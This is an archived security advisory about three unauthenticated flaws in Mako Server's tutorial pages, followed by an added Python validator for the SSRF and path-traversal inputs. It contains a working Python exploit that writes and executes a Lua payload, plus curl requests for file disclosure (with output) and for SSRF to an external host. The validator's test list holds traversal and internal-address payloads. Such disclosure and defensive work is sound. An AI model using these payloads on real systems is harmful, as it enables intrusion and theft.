{"id":9068,"date":"2017-09-03T14:19:14","date_gmt":"2017-09-03T22:19:14","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/09\/03\/news-2841\/"},"modified":"2017-09-03T14:19:14","modified_gmt":"2017-09-03T22:19:14","slug":"news-2841","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/09\/03\/news-2841\/","title":{"rendered":"SSD Advisory \u2013 Mako Web-server Tutorials Multiple Unauthenticated Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Sun, 03 Sep 2017 06:38:44 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:ssd@beyondsecurity.com\">ssd@beyondsecurity.com<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes three (3) vulnerabilities found in Mako Server&#8217;s tutorial pages.<\/p>\n<p>The vulnerabilities found are:<\/p>\n<ul>\n<li>Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution<\/li>\n<li>Unauthenticated File Disclosure<\/li>\n<li>Unauthenticated Server Side Request Forgery<\/li>\n<\/ul>\n<p>As these tutorials may be used as the basis for production code, it is important for users to be aware of these issues.<\/p>\n<p>&#8220;As a compact application and web server, the Mako Server helps developers rapidly design secure IoT and web applications. The Mako Server provides an application server environment from which developers can design and implement complete, custom solutions. 
The Mako Web Server is ideal for embedded Linux systems.&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, John Page AKA hyp3rlinx, has reported these vulnerabilities to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> RealTimeLogic was informed of the vulnerabilities on Aug 13, but while acknowledging receipt of the vulnerability information, refused to respond to the technical claims, to give a fix timeline or to coordinate an advisory, saying:<br \/> &#8220;I just sent a formal notification for the commercial license requirement and also we need to put a maintenance contract in place.<\/p>\n<p>Internally I need to set-up a cost allocation account for billing against these support inquiries.&#8221;<\/p>\n<p>At this time it&#8217;s unclear whether these vulnerabilities are going to be fixed, and further attempts to get a status clarification failed.<\/p>\n<p><span id=\"more-3391\"><\/span><\/p>\n<p><u><strong>Vulnerability details<\/strong><\/u><\/p>\n<p><strong>Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution<\/strong><br \/> The Mako web server tutorial does not sufficiently sanitize HTTP PUT requests: when an attacker sends an HTTP PUT request to the &#8216;<em>save.lsp<\/em>&#8217; page, the request body is passed, unmodified and without any authentication, to a function that writes it to the filesystem.<\/p>\n<p>The attacker&#8217;s input is therefore saved on the victim&#8217;s machine and can then be executed as Lua code by sending an HTTP GET request to &#8216;<em>manage.lsp<\/em>&#8217; with the same <em>ex<\/em> value and <em>execute=true<\/em>:<\/p>\n<pre>HTTP PUT  'http:\/\/VICTIM-IP\/examples\/save.lsp?ex=2.1'\nHTTP GET  'http:\/\/VICTIM-IP\/examples\/manage.lsp?execute=true&amp;ex=2.1&amp;type=lua'<\/pre>\n<p><strong>Proof of Concept<\/strong><\/p>\n<pre>import urllib2, time\n\n# MakoServer v2.5 Remote Command Execution 0day\n# Credits: John Page AKA hyp3rlinx\n# =========================================\n# Replace IP below with the address of the target Mako Server.\n\nprint 'MakoServer v2.5 Remote Command Execution'\n\n# Lua payload; manage.lsp later runs the saved file as Lua code.\nCMD = \"os.execute('c:\/Windows\/system32\/calc.exe')\"\n\n# Step 1: PUT the payload to save.lsp. No authentication is required and\n# the body is written to the example file for ex=2.1 as-is.\nopener = urllib2.build_opener(urllib2.HTTPHandler)\nrequest = urllib2.Request('http:\/\/IP\/examples\/save.lsp?ex=2.1', data=CMD)\nrequest.add_header('Content-Type', 'text\/plain;charset=UTF-8')\nrequest.add_header('X-Requested-With', 'XMLHttpRequest')\nrequest.add_header('Referer', 'http:\/\/localhost\/Lua-Types.lsp')\nrequest.get_method = lambda: 'PUT'  # urllib2 would otherwise send POST\nopener.open(request)\n\ntime.sleep(1)\n\n# Step 2: ask manage.lsp to execute the saved example as Lua.\nurllib2.urlopen('http:\/\/IP\/examples\/manage.lsp?execute=true&amp;ex=2.1&amp;type=lua')<\/pre>\n<p><strong>Unauthenticated File Disclosure<\/strong><br \/> The Mako web server tutorial does not sufficiently sanitize GET requests to its <em>\/fs\/<\/em> handler: when an attacker sends a GET request for a URI such as <em>IP\/fs\/..\/..<\/em>, the path is passed to the filesystem without modification and the file&#8217;s contents are returned in the response. In the proof of concept below the path after <em>\/fs\/<\/em> is resolved from the root of the filesystem, so <em>C\/Windows\/system.ini<\/em> maps to the Windows <em>system.ini<\/em> on drive C:.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> The following GET request returns the contents of <em>C\/Windows\/system.ini<\/em>:<\/p>\n<pre>curl -v http:\/\/VICTIM-IP\/fs\/C\/Windows\/system.ini\n\n* About to connect() to VICTIM-IP port 80\n*   Trying VICTIM-IP... connected\n* Connected to VICTIM-IP (VICTIM-IP) port 80\n&gt; GET \/fs\/C\/Windows\/system.ini HTTP\/1.1\n&gt; User-Agent: curl\/7.15.5 (x86_64-redhat-linux-gnu) libcurl\/7.15.5 OpenSSL\/0.9.8b zlib\/1.2.3 libidn\/0.6.5\n&gt; Host: VICTIM-IP\n&gt; Accept: *\/*\n&gt;\n&lt; HTTP\/1.1 200 OK\n&lt; Date: Mon, 07 Aug 2017 22:21:27 GMT\n&lt; Server: MakoServer.net\n&lt; Content-Type: application\/octet-stream\n&lt; Accept-Ranges: bytes\n&lt; Etag: 58b4be20\n&lt; Last-Modified: Tue, 28 Feb 2017 00:02:40 GMT\n&lt; Content-Length: 219\n&lt; Keep-Alive: Keep-Alive\n; for 16-bit app support\n[386Enh]\nwoafont=dosapp.fon\nEGA80WOA.FON=EGA80WOA.FON\nEGA40WOA.FON=EGA40WOA.FON\nCGA80WOA.FON=CGA80WOA.FON\nCGA40WOA.FON=CGA40WOA.FON\n\n[drivers]\nwave=mmdrv.dll\ntimer=timer.drv\n\n[mci]<\/pre>\n<p><strong>Unauthenticated Server Side Request Forgery<\/strong><br \/> The Mako web server tutorial does not sufficiently sanitize incoming POST requests: when an attacker sends a POST request to the &#8216;<em>rtl\/appmgr\/new-application.lsp<\/em>&#8217; URI, the supplied input is processed by the server, which then connects to the attacker&#8217;s machine.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> Start Wireshark to observe the successful connections made from the Mako Web Server victim machine.<\/p>\n<p>Then initiate the requests from another machine using curl:<\/p>\n<div id=\"crayon-59ac7fe2494cd116139830\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco 
crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> curl -v -X POST http:\/\/VICTIM-IP\/rtl\/appmgr\/new-application.lsp -d io=net -d path=http:\/\/EXTERNAL-IP<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div 
class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494cd116139830-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494cd116139830-1\"><span class=\"crayon-v\">curl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">v<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-i\">X<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">POST <\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/VICTIM-IP\/rtl\/appmgr\/new-application.lsp -d io=net -d path=http:\/\/EXTERNAL-IP<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3391\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Sun, 03 Sep 2017 06:38:44 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes three (3) 
vulnerabilities found in Mako Server&#8217;s tutorial page. The vulnerabilities found are: Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution; Unauthenticated File Disclosure; Unauthenticated Server Side Request Forgery. As these tutorials may be used as the basis for production code, it is important for users &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3391\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Mako Web-server Tutorials Multiple Unauthenticated Vulnerabilities<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11591,11851,10757,14357,12136],"class_list":["post-9068","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-file-disclosure","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-server-side-request-forgery","tag-unauthenticated-action"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9068","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9068"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9068\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9068"}],"wp:term":[{"taxonomy":"category","embe
ddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9068"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9068"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
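The Server Side Request Forgery in the advisory comes down to one thing: the `new-application.lsp` tutorial endpoint accepts `io=net` together with any `path` URL and fetches it. The validator below is an added example written for this page; it is not the Mako tutorial's own code (the tutorials are Lua/LSP) and not a vendor fix. It assumes only the two form fields the curl PoC sends (`io`, `path`). The `disk` mode, the `APP_ROOT` install directory and the `ALLOWED_NET_HOSTS` allowlist are assumptions made for the example, and the `disk` branch goes beyond the advisory's shown case to cover the path-confinement check that the file disclosure and file write issues on this page also call for.

```python
"""Added example: parameter validation for a 'new-application' style
endpoint that takes an 'io' mode and a 'path'.  Not code from the SSD
advisory or the Mako Server tutorials; 'disk' mode, APP_ROOT and
ALLOWED_NET_HOSTS are assumptions made for this example.
"""
import ipaddress
import posixpath
from typing import Tuple
from urllib.parse import urlsplit

APP_ROOT = "/opt/mako/apps"                        # hypothetical install root
ALLOWED_NET_HOSTS = {"updates.example.internal"}   # hypothetical allowlist


def is_internal_host(host: str) -> bool:
    """True for IP literals in loopback, private, link-local, reserved,
    multicast or unspecified ranges, and for localhost names.  Names that
    are not IP literals return False and are left to the allowlist check."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() in {"localhost", "localhost.localdomain"}
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def validate_new_application(io: str, path: str) -> Tuple[bool, str]:
    """Return (allowed, reason) for a request carrying io=<mode>&path=<value>.

    io='net'  : 'path' is a URL the server would fetch.  The advisory's SSRF
                exists because any URL is accepted; here only http(s) to an
                allowlisted, non-internal host passes.
    io='disk' : 'path' is a local file name and must stay inside APP_ROOT.
                (Assumed mode, not shown in the advisory.)
    """
    if io == "net":
        parts = urlsplit(path)
        if parts.scheme not in ("http", "https"):
            return False, "scheme not allowed"
        host = parts.hostname or ""          # hostname strips userinfo/port
        if is_internal_host(host):
            return False, "internal host"
        if host not in ALLOWED_NET_HOSTS:
            return False, "host not in allowlist"
        return True, "net fetch permitted"

    if io == "disk":
        if path.startswith("/") or "\\" in path or "\0" in path:
            return False, "absolute, backslash or NUL in path"
        full = posixpath.normpath(posixpath.join(APP_ROOT, path))
        if full != APP_ROOT and not full.startswith(APP_ROOT + "/"):
            return False, "path escapes app root"
        return True, "disk path permitted"

    return False, "unknown io mode"


if __name__ == "__main__":
    # The advisory's PoC payload plus constructed variants.
    for io, path in [
        ("net", "http://EXTERNAL-IP"),                        # advisory PoC
        ("net", "http://127.0.0.1:8080/"),                    # loopback pivot
        ("net", "http://169.254.169.254/latest/"),            # link-local range
        ("net", "http://updates.example.internal@127.0.0.1/"),  # userinfo trick
        ("net", "file:///etc/passwd"),                        # non-http scheme
        ("net", "https://updates.example.internal/app.zip"),  # allowlisted
        ("disk", "../../../../Windows/win.ini"),              # traversal
        ("disk", "myapp/app.zip"),
    ]:
        print(io, path, "->", validate_new_application(io, path))
```

Allowlisting by name is only sound if the fetch layer also pins the address it resolved and does not follow redirects; otherwise a DNS answer or a 302 can still steer the request to an internal host. The reason strings are this example's own. For a tutorial endpoint like the one in the advisory, the first fix is still to require authentication before any of this runs.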